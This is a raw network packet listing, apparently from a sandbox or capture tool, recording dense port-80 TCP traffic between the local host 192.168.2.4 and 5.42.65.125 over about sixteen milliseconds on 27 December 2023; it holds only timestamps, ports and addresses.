Dec 27, 2023 17:57:25.988409042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988416910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988424063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988496065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.989092112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989120007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989145041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989166021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989173889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989181995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989190102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989206076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989238024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.989257097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989263058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.989274979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989317894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989324093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.989336967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989357948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989372969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.989384890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.989411116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990030050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990051985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990103960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990119934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990125895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990134001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990144014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990150928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990180016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990207911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990209103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990226984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990255117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990282059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990289927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990298986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990314960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990333080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.990341902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990385056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.990977049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991029024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991044044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991053104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991065979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991077900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991086960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991094112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991095066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991157055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991460085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991483927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991532087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991556883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991575003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991607904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991625071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991636038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991645098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991661072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991671085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991677046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991698980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991714001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991758108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991765022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991780996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991797924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991813898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.991832018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.991856098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992317915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992419004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992490053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992506981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992521048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992549896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992568970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992579937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992611885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992624998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992629051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992656946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992672920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992791891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992809057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992820978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992836952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992839098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992885113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.992898941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.992925882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.993376970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993395090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993407965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993417025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993443012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993452072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993516922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993524075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.993537903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993582964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993598938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993649960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.993658066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993674040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993690014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993705988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993724108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.993727922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.993747950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994175911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994218111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994234085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994240046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994266987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994281054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994287014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994296074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994316101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994318962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994679928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994694948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994721889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994754076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994767904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994784117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994796991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994812012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994826078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994836092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994858980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994859934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994874954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994891882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994910002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994919062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994934082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994942904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.994947910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.994976997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995012045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995028019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995054007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995672941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995687962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995701075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995714903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995718002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995733976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995745897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995748997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995770931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995778084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995786905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995824099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995851994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995867014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995879889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995891094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995909929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995927095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995925903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995940924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995955944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.995970011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.995999098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996548891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996607065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996623993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996638060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996646881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996695995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996699095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996717930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996762037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996834993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996850967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996865988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996880054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996891975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996893883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996907949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996921062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996922016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996937990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996952057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.996970892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.996998072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.997572899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.997611046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.997627020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.997632980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.997634888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.997659922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.997685909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.997714996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.997924089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998023987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998042107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998056889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998066902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998074055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998090982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998105049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998105049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998126030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998138905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998146057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998173952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998183012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998189926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998198986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998217106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998225927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998226881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998239040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998267889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998826981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998881102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.998919964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998950958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998966932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.998985052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999001026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999021053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999028921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999044895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999048948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999059916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999068975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999078035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999134064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999150991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999155998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999160051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999169111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999193907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999249935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999763966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999779940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999815941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.999820948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999850988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999891996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999907017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999948025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.999964952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000003099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.000062943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000077963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000089884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000099897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000107050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000108004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.000116110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000130892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000158072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.000194073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.000740051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000771999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000786066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000794888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000794888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.000802994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.000852108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001071930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001089096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001136065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001149893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001164913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001173019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001180887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001188993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001224041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001228094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001249075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001257896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001280069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001293898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001298904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001318932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001346111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001347065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001362085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.001420975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.001970053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002022982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002023935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.002100945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002119064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002132893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002140045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002147913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002197027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.002233028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002248049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002264977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002279043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002288103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002295971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002300024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.002310038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002317905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.002337933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.002372026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003019094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003038883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003055096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003070116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003082991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003099918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003103018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003119946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003135920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003190994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003210068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003227949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003242970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003261089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003281116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003282070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003298044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003312111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003320932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003330946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003390074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.003925085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.003988028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004020929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004035950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004070044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004080057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004125118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004174948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004235983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004251003 CET	80	49738	5.42.65.125	192.168.2.4
